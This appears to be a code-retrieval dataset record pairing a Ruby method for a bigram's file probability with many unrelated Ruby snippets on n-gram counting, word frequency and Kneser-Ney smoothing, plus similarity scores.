"def test_approach\n prefix = \"This pangram tallies \"\n solution = \"This pangram tallies five a's, one b, one c, two d's, twenty-eight e's, eight f's, six g's, eight h's, thirteen i's, one j, one k, three l's, two m's, eighteen n's, fifteen o's, two p's, one q, seven r's, twenty-five s's, twenty-two t's, four u's, four v's, nine w's, two x's, four y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n\n prefix = \"This terribly inefficient pangram contains \"\n solution = \"This terribly inefficient pangram contains five a's, two b's, three c's, two d's, thirty-one e's, six f's, four g's, ten h's, sixteen i's, one j, one k, three l's, two m's, twenty n's, thirteen o's, two p's, one q, twelve r's, twenty-eight s's, twenty-eight t's, three u's, three v's, nine w's, four x's, six y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n end",
"def gramos\r\n grams = 0\r\n @lista_alimentos.each do |i|\r\n grams += 100\r\n end\r\n return grams\r\n end",
"def frequency\n counts = Hash.new(0)\n self.words.each { |word| counts[word] += 1 }\n counts\n end",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigrams[str[i..i+1]] += 1 \n i += 1\n end\n\n max_num = 0\n max = nil\n\n bigrams.each do |k,v|\n if v > max_num\n max_num = v\n max = k\n end\n end\n max\nend",
"def score(sentence)\n total_scores = 0\n rep_array = @sent_rep_compiler.compile(sentence)\n rep_array.each { |word| total_scores += @wts_scores_obj[word.id] }\n total_scores / rep_array.length\n end",
"def lexigram_counter(sequencetext)\n @sequencetext = sequencetext\n\t@lexigrams = lexigram_searcher(@sequencetext)\n\tif (@lexigrams === [\"no letters remain after processing\"])\n\t @lexigrams_count = 0\n else\n @lexigrams_count = @lexigrams.count.to_s\n end\n end",
"def english?(text)\n num_english = 0\n text_words = text.split(\" \")\n text_words.each do |text_word|\n WORDS_BY_FREQUENCY.each do |dict_word|\n if text_word == dict_word.upcase\n num_english += 1\n break\n end\n end\n end\n return num_english.to_f / text_words.length > 0.75\nend",
"def score\n @score ||= phonetic_levenshtein_distance + penalties\n end",
"def most_frequent_bigram(str)\n sub_str_arr = []\n bigram_count = Hash.new(0)\n str.each_char.with_index do |char,idx|\n if idx+1 != nil && str[idx..idx+1].length ==2\n sub_str_arr << str[idx..idx+1]\n end\n end\n sub_str_arr.each {|bigram| bigram_count[bigram]+=1}\n \n sorted = bigram_count.sort_by {|key,value| value}\n sorted [-1][0]\n\n\nend",
"def most_frequent_bigram(str)\n#grab substrings of length 2\n#hash that contains the substring\n#return key with max value \n\n bigrams = Hash.new(0)\n str.each_char.with_index do |char, i|\n bigrams[str[i..i+1]] += 1 if i + 1 < str.length\n end\n bigrams.max_by { |k,v| v }.first\nend",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n (0...str.length-1).each{|i| bigrams[ str[i..i+1] ] += 1}\n max = bigrams.first[0] # Hash#first returns first key value pair in an array\n bigrams.each {|key,val| max = key if val > bigrams[max]}\n # bigrams.sort_by{|b, v| v}.last[0]\n max\nend",
"def ngram_analysis(str, n)\r\n # use a hash to store ngram - frequency mapping\r\n freq = Hash.new\r\n bigram = \"\"\r\n count = n-1\r\n i = 0\r\n\r\n # get the first ngram\r\n for i in 0..count\r\n bigram[i] = str[i]\r\n end\r\n\r\n freq[bigram] = 1\r\n\r\n str.each_char do |char|\r\n if i>=n then\r\n\r\n # bigram, trigram or quadrigram?\r\n bigram[0] = bigram[1]\r\n if n==2 then\r\n bigram[1] = char\r\n elsif n==3 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = char\r\n elsif n==4 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = bigram[3]\r\n bigram[3] = char\r\n end\r\n\r\n # updates values in the hash\r\n if freq.key?(bigram)==false then\r\n freq[bigram] = 1\r\n else \r\n freq[bigram] = freq[bigram]+1\r\n end\r\n\r\n end\r\n i = i + 1\r\n end\r\n\r\n # sort and print\r\n freq = freq.sort_by {|_key, value| value}.reverse.to_h\r\n i=0\r\n puts \"N-gram Analysis Results:\"\r\n freq.each do |key, value|\r\n if value!=1 && i<20 then\r\n puts key.to_s+\"\\t\"+value.to_s\r\n end\r\n i = i + 1\r\n end\r\nend",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n\n str.each_char.with_index do |char, i|\n if i != str.length - 1\n bigram = char + str[i + 1]\n end\n hash[bigram] += 1\n end\n most_frequent = hash.values.max\n hash.each { |k, v| return k if v == most_frequent}\n\nend",
"def frequency(text)\n text = text.downcase.gsub(/\\s*/, '')\n chars = text.split('')\n freqs = Hash[('a'..'z').to_a.zip([0] * 26)]\n\n chars.each { |c| freqs[c] += 1 }\n\n freqs\n end",
"def most_frequent_bigram(str)\n most_frequent_bigram = Hash.new(0)\n\n str.each_char.with_index do |char, index|\n bigram = \"#{char}#{str[index + 1]}\"\n most_frequent_bigram[bigram] += 1\n end\n\n max_count = most_frequent_bigram.sort_by {|k, v| v}\n max_count[-1][0]\nend",
"def fragment_commonality(fragment)\n probability_of_ngrams(common_ngrams_from_fragment(fragment))\n end",
"def grams\n gram_equivalent / amount\n end",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index {|c, i| hash[c + str[i+1]] += 1 if str[i + 1]}\n hash.key(hash.values.max)\nend",
"def term_frequency(document, term)\n tf = document.term_count(term)\n if @function == :bm25\n (tf * 2.2) / (tf + 0.3 + 0.9 * documents.size / @model.average_document_size)\n else\n sqrt(tf)\n end\n end",
"def most_frequent_bigram(str)\n adjacent_letter={}\n letter=\"\"\n (0...str.length-1).each do |i|\n letter=str[i]+str[i+1]\n if adjacent_letter.has_key?(letter)\n adjacent_letter[letter]+=1\n else\n adjacent_letter[letter]=1\n end\n end\n\n max=0\n max_aj=\"\"\n adjacent_letter.each do |k,v|\n if v>max\n max=v\n max_aj=k\n end\n end\n max_aj\n\n\nend",
"def get_sentence_progresses\n if @all_sentence_count > 0\n @progress_sentence_ch = 100 * @memorized_sentence_count_ch / @all_sentence_count\n @progress_sentence_ja = 100 * @memorized_sentence_count_ja / @all_sentence_count\n else\n @progress_sentence_ch = 0\n @progress_sentence_ja = 0\n end\n end",
"def probabilities_for(ngrams)\n table = {}\n\n ngrams.each do |ngram|\n table[ngram] = probability_of_ngram(ngram)\n end\n\n return table\n end",
"def popularity_boost\n return 0 if word_datas.empty?\n\n rare_words = word_datas.select { |data| data[:rarity] }\n return 0 if rare_words.empty?\n\n # 0-1 score for popularity\n # Then divide it by 0-1 for word length\n boosts = rare_words.map do |word|\n 1 - Math.log(word[:rarity] + 1, 60_000)\n end\n boosts.reduce(0, &:+)\n end",
"def has_gram?(gram)\n @frequencies.has_key?(gram)\n end",
"def score_freq(cs)\n \" eta\".each_char.map { |c| cs.index(c) || 9999 }.reduce(&:+)\nend",
"def percentages\n @_percentages ||= words.each_with_object({}) do |word_count, hash|\n hash[word_count.first] = percentage(word_count.last)\n end\n end",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index do |char, idx|\n key = char + str[idx + 1] if idx < str.length - 1\n hash[key] += 1\n end\n\n hash.key(hash.values.max)\nend",
"def score_title title, freq_list\n title\n .split\n .map{|word| is_initialism(word) ? 4 : score_for_frequency(freq_list[sanitize word])}\n .inject(:+)\n end",
"def phonetic_coverage\n 1 - phones_in_word_list/@initial_phones.to_f\n end",
"def count(gram)\n @dirty = true\n\n unless @frequencies.has_key?(gram)\n @frequencies[gram] = 0\n end\n\n return @frequencies[gram] += 1\n end",
"def most_frequent_bigram(str)\n counter = Hash.new(0)\n (0...str.length-1).each { |i| counter[str[i] + str[i+1]] += 1 }\n sorted = counter.sort_by { |k, v| v }\n sorted[-1][0]\nend"
] | [
"0.73970234",
"0.70978487",
"0.6869366",
"0.68479264",
"0.68038917",
"0.6757227",
"0.6729877",
"0.6543553",
"0.64418244",
"0.6419717",
"0.6325295",
"0.63038254",
"0.62904406",
"0.62812465",
"0.62567854",
"0.62363577",
"0.62209475",
"0.6212022",
"0.62085927",
"0.6198233",
"0.6188971",
"0.61854017",
"0.6178421",
"0.61348134",
"0.6121978",
"0.6111741",
"0.6073402",
"0.6071395",
"0.60710406",
"0.6024717",
"0.5990377",
"0.5990095",
"0.59848964",
"0.594559",
"0.5936904",
"0.5930776",
"0.59094816",
"0.589197",
"0.5874413",
"0.58641505",
"0.5857109",
"0.5852107",
"0.5848248",
"0.5841763",
"0.58180803",
"0.58155346",
"0.5814226",
"0.5809941",
"0.58047205",
"0.5796977",
"0.578404",
"0.5783301",
"0.577499",
"0.57727563",
"0.5769943",
"0.5766564",
"0.57592744",
"0.5750287",
"0.5750269",
"0.57475096",
"0.57460743",
"0.5720607",
"0.571913",
"0.5708175",
"0.5697505",
"0.5680021",
"0.5679883",
"0.567592",
"0.567302",
"0.5669892",
"0.5669096",
"0.56497025",
"0.56450146",
"0.5630032",
"0.56216925",
"0.5618389",
"0.5617837",
"0.56172067",
"0.55966276",
"0.55929476",
"0.5587389",
"0.55819714",
"0.55800414",
"0.5577533",
"0.55715036",
"0.5570117",
"0.5560356",
"0.5555435",
"0.5552366",
"0.5550079",
"0.55496424",
"0.55377394",
"0.55352867",
"0.5533176",
"0.55292755",
"0.55235726",
"0.5521859",
"0.5518092",
"0.551356",
"0.55128646"
] | 0.7525785 | 0 |
Probability of bigram's occurance in the corpus. | def file_probability(word1, word2=nil)
bigram = (Bigram === word1 ? word1 : get(word1, word2))
BigDecimal.new(bigram.files.size) / analysis.files.size
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def probability(word1, word2=nil)\n bigram = (Bigram === word1 ? word1 : get(word1, word2))\n BigDecimal.new(bigram.count) / total #size\n end",
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def probability_of(gram)\n @probabilities.fetch(gram,0.0)\n end",
"def text_probability(text)\n probability_of_ngrams(ngrams_from_text(text))\n end",
"def calculate_probability(word)\n ham_word_frequency = 2 * words_hash[[word,:good]]\n spam_word_frequency = words_hash[[word, :bad]]\n return if ham_word_frequency + spam_word_frequency < 5\n word_probability = min(1.0, spam_word_frequency.to_f / spam_count)\n total_probability = word_probability + min(1.0, ham_word_frequency.to_f / ham_count)\n max(0.1, min(0.99, word_probability/total_probability))\n end",
"def probability(word)\n word = (Word === word ? word : get(word))\n BigDecimal.new(word.count) / total\n end",
"def sentence_probability(sentence)\n probability_of_ngrams(ngrams_from_sentence(sentence))\n end",
"def calculate_probabilities\n @words_hash.keys.each do |word, _|\n @probability_hash[word] = calculate_probability(word)\n end\n end",
"def fragment_probability(fragment)\n probability_of_ngrams(ngrams_from_fragment(fragment))\n end",
"def spamicity(message)\n words = message.split(/\\W+/).map { |m| m.downcase}\n intersting_words_probability_list = intersting_words(words)\n intersting_words_product = intersting_words_probability_list.inject(:*)\n total_probability = intersting_words_product + intersting_words_probability_list.map { |x| 1 - x }.inject(:*)\n intersting_words_product / total_probability\n end",
"def full_bigram_counts\n {\n'TH' => 116997844,\n'HE' => 100689263,\n'IN' => 87674002,\n'ER' => 77134382,\n'AN' => 69775179,\n'RE' => 60923600,\n'ES' => 57070453,\n'ON' => 56915252,\n'ST' => 54018399,\n'NT' => 50701084,\n'EN' => 48991276,\n'AT' => 48274564,\n'ED' => 46647960,\n'ND' => 46194306,\n'TO' => 46115188,\n'OR' => 45725191,\n'EA' => 43329810,\n'TI' => 42888666,\n'AR' => 42353262,\n'TE' => 42295813,\n'NG' => 38567365,\n'AL' => 38211584,\n'IT' => 37938534,\n'AS' => 37773878,\n'IS' => 37349981,\n'HA' => 35971841,\n'ET' => 32872552,\n'SE' => 31532272,\n'OU' => 31112284,\n'OF' => 30540904,\n'LE' => 30383262,\n'SA' => 30080131,\n'VE' => 29320973,\n'RO' => 29230770,\n'RA' => 28645577,\n'RI' => 27634643,\n'HI' => 27495342,\n'NE' => 27331675,\n'ME' => 27237733,\n'DE' => 27029835,\n'CO' => 26737101,\n'TA' => 26147593,\n'EC' => 25775798,\n'SI' => 25758841,\n'LL' => 24636875,\n'SO' => 23903631,\n'NA' => 23547524,\n'LI' => 23291169,\n'LA' => 23178317,\n'EL' => 23092248,\n'MA' => 21828378,\n'DI' => 21673998,\n'IC' => 21468412,\n'RT' => 21456059,\n'NS' => 21306421,\n'RS' => 21237259,\n'IO' => 21210160,\n'OM' => 21066156,\n'CH' => 20132750,\n'OT' => 20088048,\n'CA' => 19930754,\n'CE' => 19803619,\n'HO' => 19729026,\n'BE' => 19468489,\n'TT' => 19367472,\n'FO' => 18923772,\n'TS' => 18922522,\n'SS' => 18915696,\n'NO' => 18894111,\n'EE' => 18497942,\n'EM' => 18145294,\n'AC' => 17904683,\n'IL' => 17877600,\n'DA' => 17584055,\n'NI' => 17452104,\n'UR' => 17341717,\n'WA' => 16838794,\n'SH' => 16773127,\n'EI' => 16026915,\n'AM' => 15975981,\n'TR' => 15821226,\n'DT' => 15759673,\n'US' => 15699353,\n'LO' => 15596310,\n'PE' => 15573318,\n'UN' => 15237699,\n'NC' => 15214623,\n'WI' => 15213018,\n'UT' => 15137169,\n'AD' => 14877234,\n'EW' => 14776406,\n'OW' => 14610429,\n'GE' => 14425023,\n'EP' => 14024377,\n'AI' => 13974919,\n'LY' => 13742031,\n'OL' => 13726491,\n'FT' => 13696078,\n'OS' => 13596265,\n'EO' => 13524186,\n'EF' => 13252227,\n'PR' => 13191182,\n'WE' => 13185116,\n'DO' => 13120322,\n'MO' => 12950768,\n'ID' => 12896787,\n'IE' => 12505546,\n'MI' => 12168944,\n'PA' => 12068709,\n'FI' => 11993833,\n'PO' => 11917535,\n'CT' => 11888752,\n'WH' => 11852909,\n'IR' => 11681353,\n'AY' => 11523416,\n'GA' => 11239788,\n'SC' => 10800636,\n'KE' => 10650670,\n'EV' => 10574011,\n'SP' => 10570626,\n'IM' => 10544422,\n'OP' => 10459455,\n'DS' => 10429887,\n'LD' => 10245579,\n'UL' => 10173468,\n'OO' => 10168856,\n'SU' => 10031005,\n'IA' => 10002012,\n'GH' => 9880399,\n'PL' => 9812226,\n'EB' => 9738798,\n'IG' => 9530574,\n'VI' => 9380037,\n'IV' => 9129232,\n'WO' => 9106647,\n'YO' => 9088497,\n'RD' => 9025637,\n'TW' => 8910254,\n'BA' => 8867461,\n'AG' => 8809266,\n'RY' => 8788539,\n'AB' => 8775582,\n'LS' => 8675452,\n'SW' => 8673234,\n'AP' => 8553911,\n'FE' => 8529289,\n'TU' => 8477495,\n'CI' => 8446084,\n'FA' => 8357929,\n'HT' => 8351551,\n'FR' => 8339376,\n'AV' => 8288885,\n'EG' => 8286463,\n'GO' => 8188708,\n'BO' => 8172395,\n'BU' => 8113271,\n'TY' => 8008918,\n'MP' => 7835172,\n'OC' => 7646952,\n'OD' => 7610214,\n'EH' => 7559141,\n'YS' => 7539621,\n'EY' => 7528342,\n'RM' => 7377989,\n'OV' => 7350014,\n'GT' => 7347990,\n'YA' => 7239548,\n'CK' => 7205091,\n'GI' => 7103140,\n'RN' => 7064635,\n'GR' => 6989963,\n'RC' => 6974063,\n'BL' => 6941044,\n'LT' => 6817273,\n'YT' => 6714151,\n'OA' => 6554221,\n'YE' => 6499305,\n'OB' => 6212512,\n'DB' => 6106719,\n'FF' => 6085519,\n'SF' => 6073995,\n'RR' => 5896212,\n'DU' => 5861311,\n'KI' => 5814357,\n'UC' => 5742385,\n'IF' => 5740414,\n'AF' => 5702567,\n'DR' => 5701879,\n'CL' => 5683204,\n'EX' => 5649363,\n'SM' => 5580755,\n'PI' => 5559210,\n'SB' => 5553684,\n'CR' => 5514347,\n'TL' => 5403137,\n'OI' => 5336616,\n'RU' => 5330557,\n'UP' => 5306948,\n'BY' => 5232074,\n'TC' => 5196817,\n'NN' => 5180899,\n'AK' => 5137311,\n'SL' => 4965012,\n'NF' => 4950333,\n'UE' => 4927837,\n'DW' => 4906814,\n'AU' => 4884168,\n'PP' => 4873393,\n'UG' => 4832325,\n'RL' => 4803246,\n'RG' => 4645938,\n'BR' => 4621080,\n'CU' => 4604045,\n'UA' => 4589997,\n'DH' => 4585765,\n'RK' => 4491400,\n'YI' => 4461214,\n'LU' => 4402940,\n'UM' => 4389720,\n'BI' => 4356462,\n'NY' => 4343290,\n'NW' => 4215967,\n'QU' => 4169424,\n'OG' => 4163126,\n'SN' => 4157990,\n'MB' => 4121764,\n'VA' => 4111375,\n'DF' => 4033878,\n'DD' => 4001275,\n'MS' => 3922855,\n'GS' => 3920675,\n'AW' => 3918960,\n'NH' => 3915410,\n'PU' => 3858148,\n'HR' => 3843001,\n'SD' => 3842250,\n'TB' => 3815459,\n'PT' => 3812475,\n'NM' => 3796928,\n'DC' => 3782481,\n'GU' => 3768430,\n'TM' => 3759861,\n'MU' => 3755834,\n'NU' => 3732602,\n'MM' => 3730508,\n'NL' => 3692985,\n'EU' => 3674130,\n'WN' => 3649615,\n'NB' => 3602692,\n'RP' => 3588188,\n'DM' => 3544905,\n'SR' => 3513808,\n'UD' => 3499535,\n'UI' => 3481482,\n'RF' => 3436232,\n'OK' => 3397570,\n'YW' => 3379064,\n'TF' => 3368452,\n'IP' => 3348621,\n'RW' => 3348005,\n'RB' => 3346212,\n'OH' => 3254659,\n'KS' => 3227333,\n'DP' => 3145043,\n'FU' => 3138900,\n'YC' => 3128053,\n'TP' => 3070427,\n'MT' => 3055946,\n'DL' => 3050945,\n'NK' => 3043200,\n'CC' => 3026492,\n'UB' => 2990868,\n'RH' => 2968706,\n'NP' => 2968126,\n'JU' => 2924815,\n'FL' => 2890839,\n'DN' => 2840522,\n'KA' => 2833038,\n'PH' => 2825344,\n'HU' => 2771830,\n'JO' => 2721345,\n'LF' => 2702522,\n'YB' => 2696786,\n'RV' => 2692445,\n'OE' => 2616308,\n'IB' => 2598444,\n'IK' => 2585124,\n'YP' => 2581863,\n'GL' => 2576787,\n'LP' => 2543957,\n'YM' => 2516273,\n'LB' => 2463693,\n'HS' => 2462026,\n'DG' => 2442139,\n'GN' => 2426429,\n'EK' => 2411639,\n'NR' => 2393580,\n'PS' => 2377036,\n'TD' => 2346516,\n'LC' => 2328063,\n'SK' => 2321888,\n'YF' => 2305244,\n'YH' => 2291273,\n'VO' => 2253292,\n'AH' => 2225270,\n'DY' => 2218040,\n'LM' => 2216514,\n'SY' => 2214270,\n'NV' => 2194534,\n'YD' => 2122337,\n'FS' => 2047416,\n'SG' => 2043770,\n'YR' => 2021939,\n'YL' => 2013939,\n'WS' => 1988727,\n'MY' => 1949129,\n'OY' => 1932892,\n'KN' => 1903836,\n'IZ' => 1865802,\n'XP' => 1840696,\n'LW' => 1836811,\n'TN' => 1782119,\n'KO' => 1758001,\n'AA' => 1721143,\n'JA' => 1712763,\n'ZE' => 1709871,\n'FC' => 1570791,\n'GW' => 1567991,\n'TG' => 1530045,\n'XT' => 1509969,\n'FH' => 1507604,\n'LR' => 1505092,\n'JE' => 1487348,\n'YN' => 1485655,\n'GG' => 1468286,\n'GF' => 1465290,\n'EQ' => 1461436,\n'HY' => 1446451,\n'KT' => 1443985,\n'HC' => 1441057,\n'BS' => 1409672,\n'HW' => 1403223,\n'HN' => 1383958,\n'CS' => 1381608,\n'HM' => 1353001,\n'NJ' => 1342735,\n'HH' => 1329998,\n'WT' => 1301293,\n'GC' => 1299541,\n'LH' => 1274048,\n'EJ' => 1256993,\n'FM' => 1251312,\n'DV' => 1238565,\n'LV' => 1238287,\n'WR' => 1226755,\n'GP' => 1215204,\n'FP' => 1199845,\n'GB' => 1184377,\n'GM' => 1178511,\n'HL' => 1169468,\n'LK' => 1164186,\n'CY' => 1145316,\n'MC' => 1101727,\n'YG' => 1049082,\n'XI' => 1024736,\n'HB' => 1014004,\n'FW' => 1005903,\n'GY' => 979804,\n'HP' => 978649,\n'MW' => 937621,\n'PM' => 931225,\n'ZA' => 929119,\n'LG' => 926472,\n'IW' => 922059,\n'XA' => 904148,\n'FB' => 888155,\n'SV' => 882083,\n'GD' => 879792,\n'IX' => 879360,\n'AJ' => 870262,\n'KL' => 846309,\n'HF' => 834284,\n'HD' => 828755,\n'AE' => 815963,\n'SQ' => 800346,\n'DJ' => 799366,\n'FY' => 789961,\n'AZ' => 768359,\n'LN' => 752316,\n'AO' => 749566,\n'FD' => 748027,\n'KW' => 719633,\n'MF' => 715087,\n'MH' => 710864,\n'SJ' => 704442,\n'UF' => 701892,\n'TV' => 698150,\n'XC' => 697995,\n'YU' => 695512,\n'BB' => 689158,\n'WW' => 674610,\n'OJ' => 661082,\n'AX' => 660826,\n'MR' => 660619,\n'WL' => 657782,\n'XE' => 653947,\n'KH' => 650095,\n'OX' => 650078,\n'UO' => 649906,\n'ZI' => 644035,\n'FG' => 637758,\n'IH' => 610683,\n'TK' => 610333,\n'II' => 607124,\n'IU' => 576683,\n'TJ' => 559473,\n'MN' => 558397,\n'WY' => 553647,\n'KY' => 553296,\n'KF' => 537342,\n'FN' => 534362,\n'UY' => 531960,\n'PW' => 530411,\n'DK' => 525744,\n'RJ' => 518157,\n'UK' => 514873,\n'KR' => 507020,\n'KU' => 506618,\n'WM' => 505687,\n'KM' => 485617,\n'MD' => 481126,\n'ML' => 478528,\n'EZ' => 465466,\n'KB' => 457860,\n'WC' => 448394,\n'WD' => 432646,\n'HG' => 429607,\n'BT' => 428276,\n'ZO' => 424016,\n'KC' => 420017,\n'PF' => 418168,\n'YV' => 411487,\n'PC' => 400308,\n'PY' => 396147,\n'WB' => 394820,\n'YK' => 391953,\n'CP' => 382923,\n'YJ' => 378679,\n'KP' => 375653,\n'PB' => 369336,\n'CD' => 358435,\n'JI' => 357577,\n'UW' => 352732,\n'UH' => 339341,\n'WF' => 336213,\n'YY' => 332973,\n'WP' => 321746,\n'BC' => 320380,\n'AQ' => 315068,\n'CB' => 298053,\n'IQ' => 291635,\n'CM' => 285942,\n'MG' => 285133,\n'DQ' => 283314,\n'BJ' => 282608,\n'TZ' => 280007,\n'KD' => 277982,\n'PD' => 273162,\n'FJ' => 269865,\n'CF' => 267630,\n'NZ' => 266461,\n'CW' => 257253,\n'FV' => 244685,\n'VY' => 233082,\n'FK' => 228905,\n'OZ' => 228556,\n'ZZ' => 221275,\n'IJ' => 219128,\n'LJ' => 218362,\n'NQ' => 217422,\n'UV' => 212051,\n'XO' => 211173,\n'PG' => 211133,\n'HK' => 210385,\n'KG' => 209266,\n'VS' => 204093,\n'HV' => 197539,\n'BM' => 191807,\n'HJ' => 189906,\n'CN' => 188046,\n'GV' => 186777,\n'CG' => 181590,\n'WU' => 180884,\n'GJ' => 176947,\n'XH' => 166599,\n'GK' => 163830,\n'TQ' => 159111,\n'CQ' => 157546,\n'RQ' => 156933,\n'BH' => 154489,\n'XS' => 154347,\n'UZ' => 153736,\n'WK' => 148964,\n'XU' => 147533,\n'UX' => 144814,\n'BD' => 141752,\n'BW' => 140189,\n'WG' => 139890,\n'MV' => 136314,\n'MJ' => 134263,\n'PN' => 131645,\n'XM' => 127492,\n'OQ' => 122677,\n'BV' => 120081,\n'XW' => 119322,\n'KK' => 118811,\n'BP' => 115161,\n'ZU' => 113538,\n'RZ' => 113432,\n'XF' => 113031,\n'MK' => 111041,\n'ZH' => 107639,\n'BN' => 106125,\n'ZY' => 105871,\n'HQ' => 101241,\n'WJ' => 99435,\n'IY' => 98361,\n'DZ' => 98038,\n'VR' => 96416,\n'ZS' => 94993,\n'XY' => 94329,\n'CV' => 94224,\n'XB' => 94041,\n'XR' => 90046,\n'UJ' => 88168,\n'YQ' => 87953,\n'VD' => 85611,\n'PK' => 83017,\n'VU' => 82830,\n'JR' => 80471,\n'ZL' => 80039,\n'SZ' => 79840,\n'YZ' => 78281,\n'LQ' => 77148,\n'KJ' => 76816,\n'BF' => 75352,\n'NX' => 74844,\n'QA' => 73527,\n'QI' => 73387,\n'KV' => 73184,\n'ZW' => 68865,\n'WV' => 63930,\n'UU' => 63043,\n'VT' => 62912,\n'VP' => 62577,\n'XD' => 60101,\n'GQ' => 59750,\n'XL' => 59585,\n'VC' => 59024,\n'CZ' => 57914,\n'LZ' => 57314,\n'ZT' => 56955,\n'WZ' => 52836,\n'SX' => 50975,\n'ZB' => 50652,\n'VL' => 49032,\n'PV' => 48105,\n'FQ' => 47504,\n'PJ' => 47043,\n'ZM' => 46034,\n'VW' => 45608,\n'CJ' => 41526,\n'ZC' => 41037,\n'BG' => 40516,\n'JS' => 39326,\n'XG' => 39289,\n'RX' => 38654,\n'HZ' => 37066,\n'XX' => 35052,\n'VM' => 35024,\n'XN' => 34734,\n'QW' => 34669,\n'JP' => 34520,\n'VN' => 33082,\n'ZD' => 32906,\n'ZR' => 32685,\n'FZ' => 31186,\n'XV' => 31117,\n'ZP' => 30389,\n'VH' => 30203,\n'VB' => 29192,\n'ZF' => 28658,\n'GZ' => 28514,\n'TX' => 28156,\n'VF' => 28090,\n'DX' => 27413,\n'QB' => 27307,\n'BK' => 26993,\n'ZG' => 26369,\n'VG' => 25585,\n'JC' => 24770,\n'ZK' => 24262,\n'ZN' => 24241,\n'UQ' => 23386,\n'JM' => 22338,\n'VV' => 22329,\n'JD' => 21903,\n'MQ' => 21358,\n'JH' => 20960,\n'QS' => 20847,\n'JT' => 20408,\n'JB' => 19380,\n'FX' => 19313,\n'PQ' => 18607,\n'MZ' => 18271,\n'YX' => 16945,\n'QT' => 16914,\n'WQ' => 16245,\n'JJ' => 16085,\n'JW' => 16083,\n'LX' => 15467,\n'GX' => 14778,\n'JN' => 14452,\n'ZV' => 14339,\n'MX' => 14250,\n'JK' => 13967,\n'KQ' => 13905,\n'XK' => 13651,\n'JF' => 12640,\n'QM' => 12315,\n'QH' => 12273,\n'JL' => 12149,\n'JG' => 12023,\n'VK' => 11469,\n'VJ' => 11432,\n'KZ' => 11192,\n'QC' => 10667,\n'XJ' => 10629,\n'PZ' => 9697,\n'QL' => 9603,\n'QO' => 9394,\n'JV' => 8925,\n'QF' => 8778,\n'QD' => 8678,\n'BZ' => 8132,\n'HX' => 7526,\n'ZJ' => 7167,\n'PX' => 6814,\n'QP' => 6062,\n'QE' => 6020,\n'QR' => 5975,\n'ZQ' => 5773,\n'JY' => 5723,\n'BQ' => 5513,\n'XQ' => 5416,\n'CX' => 5300,\n'KX' => 5083,\n'WX' => 4678,\n'QY' => 4557,\n'QV' => 4212,\n'QN' => 3808,\n'VX' => 3192,\n'BX' => 3021,\n'JZ' => 2859,\n'VZ' => 2633,\n'QG' => 2567,\n'QQ' => 2499,\n'ZX' => 2463,\n'XZ' => 2082,\n'QK' => 2023,\n'VQ' => 1488,\n'QJ' => 1342,\n'QX' => 765,\n'JX' => 747,\n'JQ' => 722,\n'QZ' => 280\n}\n end",
"def calc_probability(actual_word, translation_word)\n d = levenshtein_distance(actual_word, translation_word)\n\n min_leng= actual_word.size < translation_word.size ? actual_word.size : translation_word.size\n p = 1.0 - d * 1.0 / min_leng\n p < 0 ? 0.0 : p\n end",
"def calculate_kn_probability next_ngram: nil, ngram_model: 0, discount: 0.25, ngram_counts: @ngram_counts, good_turing_bins: @good_turing_bins, separator: \" \"\n local_ngram_model = ngram_model==0 ? next_ngram.split(separator).count : ngram_model\n \n return calculate_mle_probability(next_ngram: next_ngram, separator: separator) if local_ngram_model==1 # Recursion stops at the unigram model\n\n prefix_regex = /^#{next_ngram.split(separator)[0..-2].join(separator)}\\b/\n prefix = next_ngram.split(separator)[0..-2].join(separator)\n suffix = next_ngram.split(separator).last\n similar_ngrams = ngram_counts[local_ngram_model].select{|ngram, _| puts \"Found #{prefix.green} #{ngram.split[1..-1].join(\" \").brown}\" if (@verbose and ngram.match(prefix_regex)); ngram.match(prefix_regex)}.count # Number of words which complete the current n-1 gram, e.g. for the n-gram \"your house looks nice\" we count \"yhl ugly\", \"yhl fine\" etc. Notice - we don't counts the number of occurences for \"yhl ugly\" etc but only the number of lower-order ngrams which complete the current ngram.\n puts \"#{'Total of '.red + similar_ngrams.to_s.red + ' found.'.red} Now calculating counts.\" if @verbose\n similar_ngrams_total_counts = ngram_counts[local_ngram_model].reduce(0){|acc, (ngram, counts)| puts \"Found #{prefix.green} #{ngram.split[1..-1].join(\" \").brown} with raw count of #{counts}\" if (@verbose and ngram.match?(prefix_regex)); if ngram.match(prefix_regex) then acc += counts; else acc; end} # It's here that we actually sum up the counts\n puts \"#{'Total count is '.red + similar_ngrams_total_counts.to_s.red}\"\n ngrams_with_fixed_suffix = ngram_counts[local_ngram_model].reduce(0){|acc, (ngram, counts)| puts \"Found #{ngram.brown} / #{suffix.green} with raw count of #{counts}\" if (@verbose and ngram.match?(/^#{suffix}\\b/)); acc += counts if ngram.match?(/^#{suffix}\\b/); acc}\n\n first_term = [get_raw_counts(next_ngram).to_f - discount, 0].max / similar_ngrams_total_counts.to_f\n second_term = discount * (similar_ngrams.to_f/ngrams_with_fixed_suffix.to_f)\n \n return first_term + (second_term * calculate_kn_probability(next_ngram: next_ngram.split(separator)[1..-1].join(separator)))\n end",
